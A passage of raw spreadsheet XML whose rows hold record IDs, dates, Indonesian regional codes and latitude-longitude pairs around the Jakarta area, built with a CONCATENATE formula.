      </c>
      <c r="O3442">
        <v>3671</v>
      </c>
      <c r="P3442">
        <v>36</v>
      </c>
      <c r="Q3442" t="s">
        <v>759</v>
      </c>
      <c r="R3442" t="s">
        <v>760</v>
      </c>
      <c r="S3442" t="s">
        <v>201</v>
      </c>
      <c r="T3442" t="s">
        <v>171</v>
      </c>
      <c r="U3442" s="5">
        <v>10670026</v>
      </c>
      <c r="V3442" s="5" t="s">
        <v>17550</v>
      </c>
      <c r="W3442" s="5">
        <v>-622562</v>
      </c>
      <c r="X3442" t="s">
        <v>21288</v>
      </c>
      <c r="Y3442" t="str">
        <f t="shared" si="53"/>
        <v>-6.22562,106.70026</v>
      </c>
    </row>
    <row r="3443" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3443">
        <v>262748</v>
      </c>
      <c r="B3443" s="1">
        <v>44247</v>
      </c>
      <c r="C3443" s="2">
        <v>0.41739583333333335</v>
      </c>
      <c r="D3443" t="s">
        <v>22</v>
      </c>
      <c r="E3443" t="s">
        <v>23</v>
      </c>
      <c r="F3443" t="s">
        <v>11442</v>
      </c>
      <c r="G3443" t="s">
        <v>11443</v>
      </c>
      <c r="H3443" t="s">
        <v>26</v>
      </c>
      <c r="I3443" t="s">
        <v>11444</v>
      </c>
      <c r="J3443" t="s">
        <v>2777</v>
      </c>
      <c r="L3443" t="s">
        <v>11445</v>
      </c>
      <c r="M3443">
        <v>3171070002</v>
      </c>
      <c r="N3443">
        <v>3171070</v>
      </c>
      <c r="O3443">
        <v>3171</v>
      </c>
      <c r="P3443">
        <v>31</v>
      </c>
      <c r="Q3443" t="s">
        <v>2142</v>
      </c>
      <c r="R3443" t="s">
        <v>121</v>
      </c>
      <c r="S3443" t="s">
        <v>108</v>
      </c>
      <c r="T3443" t="s">
        <v>33</v>
      </c>
      <c r="U3443" s="5">
        <v>10682121</v>
      </c>
      <c r="V3443" s="5" t="s">
        <v>17551</v>
      </c>
      <c r="W3443" s="5">
        <v>-624576</v>
      </c>
      <c r="X3443" t="s">
        <v>21082</v>
      </c>
      <c r="Y3443" t="str">
        <f t="shared" si="53"/>
        <v>-6.24576,106.82121</v>
      </c>
    </row>
    <row r="3444" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3444">
        <v>262787</v>
      </c>
      <c r="B3444" s="1">
        <v>44247</v>
      </c>
      <c r="C3444" s="2">
        <v>0.42063657407407407</v>
      </c>
      <c r="D3444" t="s">
        <v>22</v>
      </c>
      <c r="E3444" t="s">
        <v>23</v>
      </c>
      <c r="F3444" t="s">
        <v>11446</v>
      </c>
      <c r="G3444" t="s">
        <v>11447</v>
      </c>
      <c r="H3444" t="s">
        <v>26</v>
      </c>
      <c r="I3444" t="s">
        <v>2300</v>
      </c>
      <c r="J3444" t="s">
        <v>2842</v>
      </c>
      <c r="L3444" t="s">
        <v>11448</v>
      </c>
      <c r="M3444">
        <v>3171070005</v>
      </c>
      <c r="N3444">
        <v>3171070</v>
      </c>
      <c r="O3444">
        <v>3171</v>
      </c>
      <c r="P3444">
        <v>31</v>
      </c>
      <c r="Q3444" t="s">
        <v>218</v>
      </c>
      <c r="R3444" t="s">
        <v>121</v>
      </c>
      <c r="S3444" t="s">
        <v>108</v>
      </c>
      <c r="T3444" t="s">
        <v>33</v>
      </c>
      <c r="U3444" s="5">
        <v>10681811</v>
      </c>
      <c r="V3444" s="5" t="s">
        <v>17552</v>
      </c>
      <c r="W3444" s="5">
        <v>-623914</v>
      </c>
      <c r="X3444" t="s">
        <v>20978</v>
      </c>
      <c r="Y3444" t="str">
        <f t="shared" si="53"/>
        <v>-6.23914,106.81811</v>
      </c>
    </row>
    <row r="3445" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3445">
        <v>262825</v>
      </c>
      <c r="B3445" s="1">
        <v>44247</v>
      </c>
      <c r="C3445" s="2">
        <v>0.42219907407407403</v>
      </c>
      <c r="D3445" t="s">
        <v>22</v>
      </c>
      <c r="E3445" t="s">
        <v>23</v>
      </c>
      <c r="F3445" t="s">
        <v>11449</v>
      </c>
      <c r="G3445" t="s">
        <v>11450</v>
      </c>
      <c r="H3445" t="s">
        <v>26</v>
      </c>
      <c r="I3445" t="s">
        <v>753</v>
      </c>
      <c r="J3445" t="s">
        <v>723</v>
      </c>
      <c r="L3445" t="s">
        <v>11451</v>
      </c>
      <c r="M3445">
        <v>3174070002</v>
      </c>
      <c r="N3445">
        <v>3174070</v>
      </c>
      <c r="O3445">
        <v>3174</v>
      </c>
      <c r="P3445">
        <v>31</v>
      </c>
      <c r="Q3445" t="s">
        <v>621</v>
      </c>
      <c r="R3445" t="s">
        <v>84</v>
      </c>
      <c r="S3445" t="s">
        <v>32</v>
      </c>
      <c r="T3445" t="s">
        <v>33</v>
      </c>
      <c r="U3445" s="5">
        <v>10674668</v>
      </c>
      <c r="V3445" s="5" t="s">
        <v>17553</v>
      </c>
      <c r="W3445" s="5">
        <v>-616444</v>
      </c>
      <c r="X3445" t="s">
        <v>21163</v>
      </c>
      <c r="Y3445" t="str">
        <f t="shared" si="53"/>
        <v>-6.16444,106.74668</v>
      </c>
    </row>
    <row r="3446" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3446">
        <v>262826</v>
      </c>
      <c r="B3446" s="1">
        <v>44247</v>
      </c>
      <c r="C3446" s="2">
        <v>0.4224074074074074</v>
      </c>
      <c r="D3446" t="s">
        <v>22</v>
      </c>
      <c r="E3446" t="s">
        <v>23</v>
      </c>
      <c r="F3446" t="s">
        <v>11452</v>
      </c>
      <c r="G3446" t="s">
        <v>11453</v>
      </c>
      <c r="H3446" t="s">
        <v>26</v>
      </c>
      <c r="I3446" t="s">
        <v>5330</v>
      </c>
      <c r="J3446" t="s">
        <v>11454</v>
      </c>
      <c r="L3446" t="s">
        <v>11455</v>
      </c>
      <c r="M3446">
        <v>3173030004</v>
      </c>
      <c r="N3446">
        <v>3173030</v>
      </c>
      <c r="O3446">
        <v>3173</v>
      </c>
      <c r="P3446">
        <v>31</v>
      </c>
      <c r="Q3446" t="s">
        <v>4562</v>
      </c>
      <c r="R3446" t="s">
        <v>3128</v>
      </c>
      <c r="S3446" t="s">
        <v>62</v>
      </c>
      <c r="T3446" t="s">
        <v>33</v>
      </c>
      <c r="U3446" s="5">
        <v>10683636</v>
      </c>
      <c r="V3446" s="5" t="s">
        <v>17554</v>
      </c>
      <c r="W3446" s="5">
        <v>-618402</v>
      </c>
      <c r="X3446" t="s">
        <v>21289</v>
      </c>
      <c r="Y3446" t="str">
        <f t="shared" si="53"/>
        <v>-6.18402,106.83636</v>
      </c>
    </row>
    <row r="3447" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3447">
        <v>262827</v>
      </c>
      <c r="B3447" s="1">
        <v>44247</v>
      </c>
      <c r="C3447" s="2">
        <v>0.4228703703703704</v>
      </c>
      <c r="D3447" t="s">
        <v>22</v>
      </c>
      <c r="E3447" t="s">
        <v>23</v>
      </c>
      <c r="F3447" t="s">
        <v>11456</v>
      </c>
      <c r="G3447" t="s">
        <v>11457</v>
      </c>
      <c r="H3447" t="s">
        <v>26</v>
      </c>
      <c r="I3447" t="s">
        <v>197</v>
      </c>
      <c r="J3447" t="s">
        <v>563</v>
      </c>
      <c r="L3447" t="s">
        <v>11458</v>
      </c>
      <c r="M3447">
        <v>3174010005</v>
      </c>
      <c r="N3447">
        <v>3174010</v>
      </c>
      <c r="O3447">
        <v>3174</v>
      </c>
      <c r="P3447">
        <v>31</v>
      </c>
      <c r="Q3447" t="s">
        <v>251</v>
      </c>
      <c r="R3447" t="s">
        <v>69</v>
      </c>
      <c r="S3447" t="s">
        <v>32</v>
      </c>
      <c r="T3447" t="s">
        <v>33</v>
      </c>
      <c r="U3447" s="5">
        <v>10675622</v>
      </c>
      <c r="V3447" s="5" t="s">
        <v>17555</v>
      </c>
      <c r="W3447" s="5">
        <v>-618900</v>
      </c>
      <c r="X3447" t="s">
        <v>21290</v>
      </c>
      <c r="Y3447" t="str">
        <f t="shared" si="53"/>
        <v>-6.18900,106.75622</v>
      </c>
    </row>
    <row r="3448" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3448">
        <v>262828</v>
      </c>
      <c r="B3448" s="1">
        <v>44247</v>
      </c>
      <c r="C3448" s="2">
        <v>0.42638888888888887</v>
      </c>
      <c r="D3448" t="s">
        <v>2648</v>
      </c>
      <c r="E3448" t="s">
        <v>23</v>
      </c>
      <c r="G3448" t="s">
        <v>11459</v>
      </c>
      <c r="H3448" t="s">
        <v>26</v>
      </c>
      <c r="J3448" t="s">
        <v>1158</v>
      </c>
      <c r="L3448" t="s">
        <v>11460</v>
      </c>
      <c r="M3448">
        <v>3174010002</v>
      </c>
      <c r="N3448">
        <v>3174010</v>
      </c>
      <c r="O3448">
        <v>3174</v>
      </c>
      <c r="P3448">
        <v>31</v>
      </c>
      <c r="Q3448" t="s">
        <v>514</v>
      </c>
      <c r="R3448" t="s">
        <v>69</v>
      </c>
      <c r="S3448" t="s">
        <v>32</v>
      </c>
      <c r="T3448" t="s">
        <v>33</v>
      </c>
      <c r="U3448" s="5">
        <v>10676228</v>
      </c>
      <c r="V3448" s="5" t="s">
        <v>17556</v>
      </c>
      <c r="W3448" s="5">
        <v>-620288</v>
      </c>
      <c r="X3448" t="s">
        <v>21291</v>
      </c>
      <c r="Y3448" t="str">
        <f t="shared" si="53"/>
        <v>-6.20288,106.76228</v>
      </c>
    </row>
    <row r="3449" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3449">
        <v>262866</v>
      </c>
      <c r="B3449" s="1">
        <v>44247</v>
      </c>
      <c r="C3449" s="2">
        <v>0.42887731481481484</v>
      </c>
      <c r="D3449" t="s">
        <v>22</v>
      </c>
      <c r="E3449" t="s">
        <v>23</v>
      </c>
      <c r="F3449" t="s">
        <v>11461</v>
      </c>
      <c r="G3449" t="s">
        <v>11462</v>
      </c>
      <c r="H3449" t="s">
        <v>26</v>
      </c>
      <c r="I3449" t="s">
        <v>4537</v>
      </c>
      <c r="J3449" t="s">
        <v>3135</v>
      </c>
      <c r="L3449" t="s">
        <v>11463</v>
      </c>
      <c r="M3449">
        <v>3671020016</v>
      </c>
      <c r="N3449">
        <v>3671020</v>
      </c>
      <c r="O3449">
        <v>3671</v>
      </c>
      <c r="P3449">
        <v>36</v>
      </c>
      <c r="Q3449" t="s">
        <v>823</v>
      </c>
      <c r="R3449" t="s">
        <v>274</v>
      </c>
      <c r="S3449" t="s">
        <v>201</v>
      </c>
      <c r="T3449" t="s">
        <v>171</v>
      </c>
      <c r="U3449" s="5">
        <v>10671559</v>
      </c>
      <c r="V3449" s="5" t="s">
        <v>17557</v>
      </c>
      <c r="W3449" s="5">
        <v>-618716</v>
      </c>
      <c r="X3449" t="s">
        <v>21292</v>
      </c>
      <c r="Y3449" t="str">
        <f t="shared" si="53"/>
        <v>-6.18716,106.71559</v>
      </c>
    </row>
    <row r="3450" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3450">
        <v>262905</v>
      </c>
      <c r="B3450" s="1">
        <v>44247</v>
      </c>
      <c r="C3450" s="2">
        <v>0.43188657407407405</v>
      </c>
      <c r="D3450" t="s">
        <v>22</v>
      </c>
      <c r="E3450" t="s">
        <v>23</v>
      </c>
      <c r="F3450" t="s">
        <v>11464</v>
      </c>
      <c r="G3450" t="s">
        <v>11465</v>
      </c>
      <c r="H3450" t="s">
        <v>26</v>
      </c>
      <c r="I3450" t="s">
        <v>1683</v>
      </c>
      <c r="J3450" t="s">
        <v>2627</v>
      </c>
      <c r="L3450" t="s">
        <v>11466</v>
      </c>
      <c r="M3450">
        <v>3216081004</v>
      </c>
      <c r="N3450">
        <v>3216081</v>
      </c>
      <c r="O3450">
        <v>3216</v>
      </c>
      <c r="P3450">
        <v>32</v>
      </c>
      <c r="Q3450" t="s">
        <v>11467</v>
      </c>
      <c r="R3450" t="s">
        <v>2512</v>
      </c>
      <c r="S3450" t="s">
        <v>41</v>
      </c>
      <c r="T3450" t="s">
        <v>42</v>
      </c>
      <c r="U3450" s="5">
        <v>10707092</v>
      </c>
      <c r="V3450" s="5" t="s">
        <v>17558</v>
      </c>
      <c r="W3450" s="5">
        <v>-627139</v>
      </c>
      <c r="X3450" t="s">
        <v>21293</v>
      </c>
      <c r="Y3450" t="str">
        <f t="shared" si="53"/>
        <v>-6.27139,107.07092</v>
      </c>
    </row>
    <row r="3451" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3451">
        <v>262906</v>
      </c>
      <c r="B3451" s="1">
        <v>44247</v>
      </c>
      <c r="C3451" s="2">
        <v>0.43368055555555557</v>
      </c>
      <c r="D3451" t="s">
        <v>22</v>
      </c>
      <c r="E3451" t="s">
        <v>23</v>
      </c>
      <c r="F3451" t="s">
        <v>11468</v>
      </c>
      <c r="G3451" t="s">
        <v>11469</v>
      </c>
      <c r="H3451" t="s">
        <v>26</v>
      </c>
      <c r="I3451" t="s">
        <v>1633</v>
      </c>
      <c r="J3451" t="s">
        <v>11470</v>
      </c>
      <c r="M3451">
        <v>3174010005</v>
      </c>
      <c r="N3451">
        <v>3174010</v>
      </c>
      <c r="O3451">
        <v>3174</v>
      </c>
      <c r="P3451">
        <v>31</v>
      </c>
      <c r="Q3451" t="s">
        <v>251</v>
      </c>
      <c r="R3451" t="s">
        <v>69</v>
      </c>
      <c r="S3451" t="s">
        <v>32</v>
      </c>
      <c r="T3451" t="s">
        <v>33</v>
      </c>
      <c r="U3451" s="5">
        <v>10675077</v>
      </c>
      <c r="V3451" s="5" t="s">
        <v>17559</v>
      </c>
      <c r="W3451" s="5">
        <v>-618237</v>
      </c>
      <c r="X3451" t="s">
        <v>19141</v>
      </c>
      <c r="Y3451" t="str">
        <f t="shared" si="53"/>
        <v>-6.18237,106.75077</v>
      </c>
    </row>
    <row r="3452" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3452">
        <v>263019</v>
      </c>
      <c r="B3452" s="1">
        <v>44247</v>
      </c>
      <c r="C3452" s="2">
        <v>0.44293981481481487</v>
      </c>
      <c r="D3452" t="s">
        <v>22</v>
      </c>
      <c r="E3452" t="s">
        <v>23</v>
      </c>
      <c r="F3452" t="s">
        <v>11471</v>
      </c>
      <c r="G3452" t="s">
        <v>11472</v>
      </c>
      <c r="H3452" t="s">
        <v>26</v>
      </c>
      <c r="I3452" t="s">
        <v>1971</v>
      </c>
      <c r="J3452" t="s">
        <v>3135</v>
      </c>
      <c r="L3452" t="s">
        <v>11473</v>
      </c>
      <c r="M3452">
        <v>3674040005</v>
      </c>
      <c r="N3452">
        <v>3674040</v>
      </c>
      <c r="O3452">
        <v>3674</v>
      </c>
      <c r="P3452">
        <v>36</v>
      </c>
      <c r="Q3452" t="s">
        <v>9716</v>
      </c>
      <c r="R3452" t="s">
        <v>229</v>
      </c>
      <c r="S3452" t="s">
        <v>170</v>
      </c>
      <c r="T3452" t="s">
        <v>171</v>
      </c>
      <c r="U3452" s="5">
        <v>10672732</v>
      </c>
      <c r="V3452" s="5" t="s">
        <v>17560</v>
      </c>
      <c r="W3452" s="5">
        <v>-630277</v>
      </c>
      <c r="X3452" t="s">
        <v>21294</v>
      </c>
      <c r="Y3452" t="str">
        <f t="shared" si="53"/>
        <v>-6.30277,106.72732</v>
      </c>
    </row>
    <row r="3453" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3453">
        <v>263025</v>
      </c>
      <c r="B3453" s="1">
        <v>44247</v>
      </c>
      <c r="C3453" s="2">
        <v>0.44513888888888892</v>
      </c>
      <c r="D3453" t="s">
        <v>2648</v>
      </c>
      <c r="E3453" t="s">
        <v>23</v>
      </c>
      <c r="G3453" t="s">
        <v>11474</v>
      </c>
      <c r="H3453" t="s">
        <v>26</v>
      </c>
      <c r="I3453" t="s">
        <v>103</v>
      </c>
      <c r="J3453" t="s">
        <v>404</v>
      </c>
      <c r="L3453" t="s">
        <v>11475</v>
      </c>
      <c r="M3453">
        <v>3174020005</v>
      </c>
      <c r="N3453">
        <v>3174020</v>
      </c>
      <c r="O3453">
        <v>3174</v>
      </c>
      <c r="P3453">
        <v>31</v>
      </c>
      <c r="Q3453" t="s">
        <v>30</v>
      </c>
      <c r="R3453" t="s">
        <v>31</v>
      </c>
      <c r="S3453" t="s">
        <v>32</v>
      </c>
      <c r="T3453" t="s">
        <v>33</v>
      </c>
      <c r="U3453" s="5">
        <v>10676922</v>
      </c>
      <c r="V3453" s="5" t="s">
        <v>17561</v>
      </c>
      <c r="W3453" s="5">
        <v>-616618</v>
      </c>
      <c r="X3453" t="s">
        <v>21295</v>
      </c>
      <c r="Y3453" t="str">
        <f t="shared" si="53"/>
        <v>-6.16618,106.76922</v>
      </c>
    </row>
    <row r="3454" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3454">
        <v>263324</v>
      </c>
      <c r="B3454" s="1">
        <v>44247</v>
      </c>
      <c r="C3454" s="2">
        <v>0.46722222222222221</v>
      </c>
      <c r="D3454" t="s">
        <v>22</v>
      </c>
      <c r="E3454" t="s">
        <v>23</v>
      </c>
      <c r="F3454" t="s">
        <v>11476</v>
      </c>
      <c r="G3454" t="s">
        <v>11477</v>
      </c>
      <c r="H3454" t="s">
        <v>26</v>
      </c>
      <c r="I3454" t="s">
        <v>9081</v>
      </c>
      <c r="J3454" t="s">
        <v>2627</v>
      </c>
      <c r="M3454">
        <v>3216061004</v>
      </c>
      <c r="N3454">
        <v>3216061</v>
      </c>
      <c r="O3454">
        <v>3216</v>
      </c>
      <c r="P3454">
        <v>32</v>
      </c>
      <c r="Q3454" t="s">
        <v>54</v>
      </c>
      <c r="R3454" t="s">
        <v>55</v>
      </c>
      <c r="S3454" t="s">
        <v>41</v>
      </c>
      <c r="T3454" t="s">
        <v>42</v>
      </c>
      <c r="U3454" s="5">
        <v>10716430</v>
      </c>
      <c r="V3454" s="5" t="s">
        <v>17562</v>
      </c>
      <c r="W3454" s="5">
        <v>-629813</v>
      </c>
      <c r="X3454" t="s">
        <v>21296</v>
      </c>
      <c r="Y3454" t="str">
        <f t="shared" si="53"/>
        <v>-6.29813,107.16430</v>
      </c>
    </row>
    <row r="3455" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3455">
        <v>263363</v>
      </c>
      <c r="B3455" s="1">
        <v>44247</v>
      </c>
      <c r="C3455" s="2">
        <v>0.47025462962962966</v>
      </c>
      <c r="D3455" t="s">
        <v>22</v>
      </c>
      <c r="E3455" t="s">
        <v>23</v>
      </c>
      <c r="F3455" t="s">
        <v>11478</v>
      </c>
      <c r="G3455" t="s">
        <v>11479</v>
      </c>
      <c r="H3455" t="s">
        <v>26</v>
      </c>
      <c r="I3455" t="s">
        <v>5612</v>
      </c>
      <c r="J3455" t="s">
        <v>2627</v>
      </c>
      <c r="L3455" t="s">
        <v>11480</v>
      </c>
      <c r="M3455">
        <v>3275060008</v>
      </c>
      <c r="N3455">
        <v>3275060</v>
      </c>
      <c r="O3455">
        <v>3275</v>
      </c>
      <c r="P3455">
        <v>32</v>
      </c>
      <c r="Q3455" t="s">
        <v>2473</v>
      </c>
      <c r="R3455" t="s">
        <v>114</v>
      </c>
      <c r="S3455" t="s">
        <v>41</v>
      </c>
      <c r="T3455" t="s">
        <v>42</v>
      </c>
      <c r="U3455" s="5">
        <v>10696749</v>
      </c>
      <c r="V3455" s="5" t="s">
        <v>17563</v>
      </c>
      <c r="W3455" s="5">
        <v>-623539</v>
      </c>
      <c r="X3455" t="s">
        <v>21297</v>
      </c>
      <c r="Y3455" t="str">
        <f t="shared" si="53"/>
        <v>-6.23539,106.96749</v>
      </c>
    </row>
    <row r="3456" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3456">
        <v>263402</v>
      </c>
      <c r="B3456" s="1">
        <v>44247</v>
      </c>
      <c r="C3456" s="2">
        <v>0.47447916666666662</v>
      </c>
      <c r="D3456" t="s">
        <v>22</v>
      </c>
      <c r="E3456" t="s">
        <v>23</v>
      </c>
      <c r="F3456" t="s">
        <v>11481</v>
      </c>
      <c r="G3456" t="s">
        <v>11482</v>
      </c>
      <c r="H3456" t="s">
        <v>26</v>
      </c>
      <c r="I3456" t="s">
        <v>386</v>
      </c>
      <c r="J3456" t="s">
        <v>3135</v>
      </c>
      <c r="L3456" t="s">
        <v>11483</v>
      </c>
      <c r="M3456">
        <v>3671021008</v>
      </c>
      <c r="N3456">
        <v>3671021</v>
      </c>
      <c r="O3456">
        <v>3671</v>
      </c>
      <c r="P3456">
        <v>36</v>
      </c>
      <c r="Q3456" t="s">
        <v>11484</v>
      </c>
      <c r="R3456" t="s">
        <v>454</v>
      </c>
      <c r="S3456" t="s">
        <v>201</v>
      </c>
      <c r="T3456" t="s">
        <v>171</v>
      </c>
      <c r="U3456" s="5">
        <v>10669213</v>
      </c>
      <c r="V3456" s="5" t="s">
        <v>17564</v>
      </c>
      <c r="W3456" s="5">
        <v>-620388</v>
      </c>
      <c r="X3456" t="s">
        <v>21298</v>
      </c>
      <c r="Y3456" t="str">
        <f t="shared" si="53"/>
        <v>-6.20388,106.69213</v>
      </c>
    </row>
    <row r="3457" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3457">
        <v>263479</v>
      </c>
      <c r="B3457" s="1">
        <v>44247</v>
      </c>
      <c r="C3457" s="2">
        <v>0.48039351851851847</v>
      </c>
      <c r="D3457" t="s">
        <v>22</v>
      </c>
      <c r="E3457" t="s">
        <v>23</v>
      </c>
      <c r="F3457" t="s">
        <v>11485</v>
      </c>
      <c r="G3457" t="s">
        <v>11486</v>
      </c>
      <c r="H3457" t="s">
        <v>26</v>
      </c>
      <c r="I3457" t="s">
        <v>4350</v>
      </c>
      <c r="J3457" t="s">
        <v>5573</v>
      </c>
      <c r="L3457" t="s">
        <v>11487</v>
      </c>
      <c r="M3457">
        <v>3171070005</v>
      </c>
      <c r="N3457">
        <v>3171070</v>
      </c>
      <c r="O3457">
        <v>3171</v>
      </c>
      <c r="P3457">
        <v>31</v>
      </c>
      <c r="Q3457" t="s">
        <v>218</v>
      </c>
      <c r="R3457" t="s">
        <v>121</v>
      </c>
      <c r="S3457" t="s">
        <v>108</v>
      </c>
      <c r="T3457" t="s">
        <v>33</v>
      </c>
      <c r="U3457" s="5">
        <v>10682203</v>
      </c>
      <c r="V3457" s="5" t="s">
        <v>17565</v>
      </c>
      <c r="W3457" s="5">
        <v>-623713</v>
      </c>
      <c r="X3457" t="s">
        <v>21299</v>
      </c>
      <c r="Y3457" t="str">
        <f t="shared" si="53"/>
        <v>-6.23713,106.82203</v>
      </c>
    </row>
    <row r="3458" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3458">
        <v>263480</v>
      </c>
      <c r="B3458" s="1">
        <v>44247</v>
      </c>
      <c r="C3458" s="2">
        <v>0.48353009259259255</v>
      </c>
      <c r="D3458" t="s">
        <v>22</v>
      </c>
      <c r="E3458" t="s">
        <v>23</v>
      </c>
      <c r="F3458" t="s">
        <v>11488</v>
      </c>
      <c r="H3458" t="s">
        <v>26</v>
      </c>
      <c r="I3458" t="s">
        <v>2196</v>
      </c>
      <c r="J3458" t="s">
        <v>3135</v>
      </c>
      <c r="L3458" t="s">
        <v>11489</v>
      </c>
      <c r="M3458">
        <v>3671020013</v>
      </c>
      <c r="N3458">
        <v>3671020</v>
      </c>
      <c r="O3458">
        <v>3671</v>
      </c>
      <c r="P3458">
        <v>36</v>
      </c>
      <c r="Q3458" t="s">
        <v>274</v>
      </c>
      <c r="R3458" t="s">
        <v>274</v>
      </c>
      <c r="S3458" t="s">
        <v>201</v>
      </c>
      <c r="T3458" t="s">
        <v>171</v>
      </c>
      <c r="U3458" s="5">
        <v>10666911</v>
      </c>
      <c r="V3458" s="5" t="s">
        <v>17566</v>
      </c>
      <c r="W3458" s="5">
        <v>-619571</v>
      </c>
      <c r="X3458" t="s">
        <v>21300</v>
      </c>
      <c r="Y3458" t="str">
        <f t="shared" si="53"/>
        <v>-6.19571,106.66911</v>
      </c>
    </row>
    <row r="3459" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3459">
        <v>263519</v>
      </c>
      <c r="B3459" s="1">
        <v>44247</v>
      </c>
      <c r="C3459" s="2">
        <v>0.48648148148148151</v>
      </c>
      <c r="D3459" t="s">
        <v>22</v>
      </c>
      <c r="E3459" t="s">
        <v>23</v>
      </c>
      <c r="F3459" t="s">
        <v>11490</v>
      </c>
      <c r="H3459" t="s">
        <v>26</v>
      </c>
      <c r="I3459" t="s">
        <v>1009</v>
      </c>
      <c r="J3459" t="s">
        <v>3135</v>
      </c>
      <c r="L3459" t="s">
        <v>11491</v>
      </c>
      <c r="M3459">
        <v>3671020013</v>
      </c>
      <c r="N3459">
        <v>3671020</v>
      </c>
      <c r="O3459">
        <v>3671</v>
      </c>
      <c r="P3459">
        <v>36</v>
      </c>
      <c r="Q3459" t="s">
        <v>274</v>
      </c>
      <c r="R3459" t="s">
        <v>274</v>
      </c>
      <c r="S3459" t="s">
        <v>201</v>
      </c>
      <c r="T3459" t="s">
        <v>171</v>
      </c>
      <c r="U3459" s="5">
        <v>10666911</v>
      </c>
      <c r="V3459" s="5" t="s">
        <v>17566</v>
      </c>
      <c r="W3459" s="5">
        <v>-619569</v>
      </c>
      <c r="X3459" t="s">
        <v>21301</v>
      </c>
      <c r="Y3459" t="str">
        <f t="shared" ref="Y3459:Y3522" si="54">CONCATENATE(X3459,",",V3459)</f>
        <v>-6.19569,106.66911</v>
      </c>
    </row>
    <row r="3460" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3460">
        <v>263594</v>
      </c>
      <c r="B3460" s="1">
        <v>44247</v>
      </c>
      <c r="C3460" s="2">
        <v>0.49086805555555557</v>
      </c>
      <c r="D3460" t="s">
        <v>22</v>
      </c>
      <c r="E3460" t="s">
        <v>23</v>
      </c>
      <c r="F3460" t="s">
        <v>11492</v>
      </c>
      <c r="H3460" t="s">
        <v>26</v>
      </c>
      <c r="I3460" t="s">
        <v>831</v>
      </c>
      <c r="J3460" t="s">
        <v>2777</v>
      </c>
      <c r="L3460" t="s">
        <v>11493</v>
      </c>
      <c r="M3460">
        <v>3171070002</v>
      </c>
      <c r="N3460">
        <v>3171070</v>
      </c>
      <c r="O3460">
        <v>3171</v>
      </c>
      <c r="P3460">
        <v>31</v>
      </c>
      <c r="Q3460" t="s">
        <v>2142</v>
      </c>
      <c r="R3460" t="s">
        <v>121</v>
      </c>
      <c r="S3460" t="s">
        <v>108</v>
      </c>
      <c r="T3460" t="s">
        <v>33</v>
      </c>
      <c r="U3460" s="5">
        <v>10682118</v>
      </c>
      <c r="V3460" s="5" t="s">
        <v>17567</v>
      </c>
      <c r="W3460" s="5">
        <v>-624664</v>
      </c>
      <c r="X3460" t="s">
        <v>21302</v>
      </c>
      <c r="Y3460" t="str">
        <f t="shared" si="54"/>
        <v>-6.24664,106.82118</v>
      </c>
    </row>
    <row r="3461" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3461">
        <v>263632</v>
      </c>
      <c r="B3461" s="1">
        <v>44247</v>
      </c>
      <c r="C3461" s="2">
        <v>0.49440972222222218</v>
      </c>
      <c r="D3461" t="s">
        <v>22</v>
      </c>
      <c r="E3461" t="s">
        <v>23</v>
      </c>
      <c r="F3461" s="3" t="s">
        <v>11494</v>
      </c>
      <c r="G3461" t="s">
        <v>11495</v>
      </c>
      <c r="H3461" t="s">
        <v>26</v>
      </c>
      <c r="I3461" t="s">
        <v>197</v>
      </c>
      <c r="J3461" t="s">
        <v>2627</v>
      </c>
      <c r="L3461" t="s">
        <v>11496</v>
      </c>
      <c r="M3461">
        <v>3275031001</v>
      </c>
      <c r="N3461">
        <v>3275031</v>
      </c>
      <c r="O3461">
        <v>3275</v>
      </c>
      <c r="P3461">
        <v>32</v>
      </c>
      <c r="Q3461" t="s">
        <v>10622</v>
      </c>
      <c r="R3461" t="s">
        <v>574</v>
      </c>
      <c r="S3461" t="s">
        <v>41</v>
      </c>
      <c r="T3461" t="s">
        <v>42</v>
      </c>
      <c r="U3461" s="5">
        <v>10701599</v>
      </c>
      <c r="V3461" s="5" t="s">
        <v>17568</v>
      </c>
      <c r="W3461" s="5">
        <v>-632135</v>
      </c>
      <c r="X3461" t="s">
        <v>21303</v>
      </c>
      <c r="Y3461" t="str">
        <f t="shared" si="54"/>
        <v>-6.32135,107.01599</v>
      </c>
    </row>
    <row r="3462" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3462">
        <v>263633</v>
      </c>
      <c r="B3462" s="1">
        <v>44247</v>
      </c>
      <c r="C3462" s="2">
        <v>0.4949884259259259</v>
      </c>
      <c r="D3462" t="s">
        <v>22</v>
      </c>
      <c r="E3462" t="s">
        <v>23</v>
      </c>
      <c r="F3462" t="s">
        <v>11497</v>
      </c>
      <c r="H3462" t="s">
        <v>26</v>
      </c>
      <c r="I3462" t="s">
        <v>193</v>
      </c>
      <c r="J3462" t="s">
        <v>2627</v>
      </c>
      <c r="L3462" t="s">
        <v>11498</v>
      </c>
      <c r="M3462">
        <v>3216071004</v>
      </c>
      <c r="N3462">
        <v>3216071</v>
      </c>
      <c r="O3462">
        <v>3216</v>
      </c>
      <c r="P3462">
        <v>32</v>
      </c>
      <c r="Q3462" t="s">
        <v>11499</v>
      </c>
      <c r="R3462" t="s">
        <v>2013</v>
      </c>
      <c r="S3462" t="s">
        <v>41</v>
      </c>
      <c r="T3462" t="s">
        <v>42</v>
      </c>
      <c r="U3462" s="5">
        <v>10706751</v>
      </c>
      <c r="V3462" s="5" t="s">
        <v>17569</v>
      </c>
      <c r="W3462" s="5">
        <v>-631454</v>
      </c>
      <c r="X3462" t="s">
        <v>21304</v>
      </c>
      <c r="Y3462" t="str">
        <f t="shared" si="54"/>
        <v>-6.31454,107.06751</v>
